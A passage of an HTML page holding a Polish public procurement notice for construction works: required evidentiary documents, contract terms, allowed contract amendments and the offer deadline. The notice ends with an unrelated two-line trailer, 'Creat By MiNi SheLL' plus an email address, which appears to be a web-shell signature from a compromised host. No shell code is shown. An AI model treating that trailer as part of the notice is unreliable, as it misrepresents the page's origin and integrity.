ubezpieczenia<br/>społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>3) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ustawy (wzór oświadczenia stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych, zgodny ze wzorem zamieszczonym w załączniku nr 2 do SWZ, wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty<br/>Uwaga: Jeżeli wykonawca powołuje sią na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych faktycznie przez niego wykonanych.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie będzie dysponował niezbędnymi zasobami podmiotów udostępniających zasoby (jeżeli dotyczy).<br/>2. Pełnomocnictwo lub inne dokumenty z których wynika prawo do podpisania oferty oraz do podpisania innych dokumentów składanych wraz z ofertą, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2019r. poz.700 z późn.zm.), o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1) zaświadczenia, o którym mowa w sekcji 5.6) pkt 1 ogłoszenia, zaświadczenia albo innego dokumentu potwierdzającego,<br/>że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o których mowa w sekcji 5.6)<br/>pkt 2 ogłoszenia– składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,<br/>- wystawione nie wcześniej niż 3 miesiące przed ich złożeniem<br/>4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa ust. 3, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 109 ust.1 pkt 1 Pzp zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy (wystawione nie wcześniej niż 3 miesiące przed ich złożeniem).<br/>5.Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust.1 ustawy dotyczącego niepodlegania wykluczeniu oraz spełniania warunków udziału w postępowaniu, potwierdzającego także brak podstaw do wykluczenia z postępowania na podstawie art.7 ust.1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.z 2025r., poz.514). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są przedstawić:<br/>a) pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>ewentualnie umowę o współdziałaniu z której będzie wynikać przedmiotowe pełnomocnictwo,<br/>b) oświadczenie składane na podstawie art.117 ust. 4 (wg wzoru stanowiącego załącznik nr 4 do SWZ).<br/>2.Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość zmiany umowy w zakresie terminu realizacji przedmiotu zamówienia , gdy jest ona<br/>spowodowana:<br/>1) koniecznością wykonania części dokumentacji jako zamiennej,<br/>2) warunkami atmosferycznymi – w których przez okres co najmniej 3 dni niemożliwe jest prowadzenie robót bezpiecznie<br/>pod względem BHP, w sposób prawidłowy, zgodny z umówioną technologia lub zasadami wiedzy technicznej,<br/>3) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezależnych od Wykonawcy,<br/>4) siłą wyższą w rozumieniu postanowień Umowy,<br/>5) wydłużeniem minimalnych określonych przepisami terminów uzyskania niezbędnych uzgodnień i decyzji przez<br/>Wykonawcę i Zamawiającego, pomimo dopełnienia przez Wykonawcę i Zamawiającego należytej staranności,<br/>6) przestojami i opóźnieniami zawinionymi przez Zamawiającego,<br/>7) wstrzymaniem robót z przyczyn nie wynikających z winy stron niniejszej umowy;<br/>8) koniecznością wprowadzenia zmian w dokumentacji projektowej bądź specyfikacji technicznej wykonania i odbioru robót<br/>budowlanych,<br/>9) wystąpieniem robót zamiennych, wpływających na zmianę terminu wykonania umowy,<br/>10) konieczności wykonania robót dodatkowych, o których mowa w art. 455 ust. 1 pkt 3) ustawy PZP, wpływających na<br/>zmianę terminu wykonania umowy,<br/>11) wystąpieniem opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, opinii, warunków do wydania których właściwe<br/>organy, instytucje, gestorzy mediów są zobowiązani na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za<br/>które Wykonawca ponosi odpowiedzialność,<br/>12) brakiem możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub<br/>nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,<br/>13) wystąpieniem niekorzystnych, anormalnych warunków atmosferycznych uniemożliwiających prowadzenie robót, zgodnie<br/>z obowiązującymi polskimi i europejskimi normami budowlanymi.<br/>2. Informacja o zaistnieniu okoliczności, o których mowa w ust. 1 musi być przekazana Zamawiającemu na piśmie, a w<br/>przypadkach, o których mowa w ust.<br/>1 pkt 2-4 dodatkowo potwierdzona przez inspektora nadzoru.<br/>3. W przypadku wystąpienia opóźnień spowodowanych wyżej wymienionymi okolicznościami, strony ustalą nowe terminy, z<br/>tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu zamówienia równy będzie okresowi<br/>uzasadnionej przerwy lub przestoju.<br/>4. Zamawiający dopuszcza możliwość zmiany Umowy w zakresie przedmiotu zamówienia lub zmiany wynagrodzenia w<br/>przypadkach:<br/>1) konieczności wykonania części dokumentacji jako zamiennej – bez zmiany wynagrodzenia Wykonawcy,<br/>2) gdy wykonanie całego zakresu nie będzie możliwe z przyczyn prawnych, finansowych, organizacyjnych lub społecznych<br/>niezależnych od Wykonawcy,<br/>3) stwierdzenia przez Zamawiającego konieczności rezygnacji z wykonania części przedmiotu zamówienia,<br/>4) konieczności wykonania robót dodatkowych określonych w § 3 ust. 7 na zasadach określonych w § 3 ust. 8 i 9,<br/>5) ustawowej zmiany stawki podatku od towarów i usług (VAT) odpowiednio poprzez podwyższenie lub obniżenie<br/>wynagrodzenia brutto z tym, że wynagrodzenie netto pozostanie niezmienione,<br/>6) w sytuacjach określonych w pkt 2 i 3 rozliczenie za wykonane roboty nastąpi w sposób analogiczny, jak wskazano w § 17<br/>ust. 8.<br/>(pozostałe informacje w sekcji IX ogłoszenia) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofert składać należy przez Platformę e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> (ciąg dalszy z sekcji VII - Projektowane postanowienia umowy)<br/>5. Zamawiający przewiduje zmiany w zawartej Umowie w stosunku, do treści oferty na podstawie, której dokonano wyboru<br/>Wykonawcy, w następującym zakresie:<br/>1) zmiany podwykonawcy z zastrzeżeniem, że jeśli Wykonawca w postępowaniu o udzielenie niniejszego zamówienia, w<br/>wyniku, którego zawarto Umowę, posłużył się doświadczeniem podwykonawcy, nowy podwykonawca musi również<br/>wykazać się doświadczeniem wymaganym przez Zamawiającego w procedurze o udzielenie zamówienia będącego przedmiotem Umowy;<br/>2) zmiany sposobu spełnienia świadczenia (roboty zamienne nie powodujące rozszerzenia przedmiotu zamówienia w<br/>stosunku do przedmiotu określonego w SWZ oraz wynikającego z treści oferty), w szczególności:<br/>- konieczność zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych<br/>niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji,<br/>gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia;<br/>- konieczność wprowadzenia przez Zamawiającego zmian w dokumentacji projektowej lub specyfikacji technicznej<br/>wykonania i odbioru robót budowlanych;<br/>- konieczność zrealizowania przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych lub materiałowych<br/>ze względu na zmiany obowiązującego prawa;<br/>- konieczność zmiany materiałów lub urządzeń, w sytuacji ich niedostępności na rynku spowodowanej zaprzestaniem<br/>produkcji lub wycofaniem z rynku tych materiałów bądź urządzeń;<br/>3) zmian z powodu istotnych braków lub błędów w dokumentacji, w tym również polegających na niezgodności dokumentacji<br/>z przepisami prawa.<br/>6. Powyższe zmiany Umowy wymagają formy oświadczenia woli złożonego przez obie Strony w formie pisemnej pod<br/>rygorem nieważności.<br/>7. Nieważność któregokolwiek z postanowień Umowy nie narusza ważności pozostałych jej postanowień, a Strony<br/>zobowiązują się w takim przypadku niezwłocznie zastąpić nieważne postanowienie innym, prawnie wiążącym, które możliwie najwierniej oddaje zamierzony cel nieważnego postanowienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com